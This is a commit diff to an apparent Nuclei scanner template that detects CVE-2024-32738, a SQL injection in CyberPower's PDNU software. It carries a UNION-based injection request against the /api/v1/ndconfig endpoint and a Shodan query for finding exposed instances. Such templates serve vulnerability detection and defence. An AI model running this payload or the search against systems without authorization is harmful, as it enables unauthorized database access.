Update CVE-2024-32738.yaml

http/cves/2024/CVE-2024-32738.yaml

@@ -1,7 +1,7 @@
 id: CVE-2024-32738
 
 info:
-  name: CyberPower - SQL Injection in MCUDBHelper (PTask Lean Query)
+  name: CyberPower - SQL Injection
   author: DhiyaneshDk
   severity: high
   description: |
@@ -11,6 +11,7 @@ info:
   reference:
     - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
     - https://www.tenable.com/security/research/tra-2024-14
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32738
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -21,13 +22,13 @@ info:
   metadata:
     verified: true
     max-request: 1
+    shodan-query: html:"<title>PDNU</title>"
   tags: cve,cve2024,cyberpower,sqli
 
 http:
-  - raw:
-      - |
-        GET /api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
 
     matchers-condition: and
     matchers:
@@ -36,6 +37,7 @@ http:
         words:
           - ':"finished"'
           - '"success":'
+          - 'modifiedtime":'
         condition: and
 
       - type: word
@@ -51,4 +53,4 @@ http:
       - type: regex
         group: 1
         regex:
-          - '"modifiedtime":(["0-9.]+)"'
+          - '"modifiedtime":"([0-9.]+)"'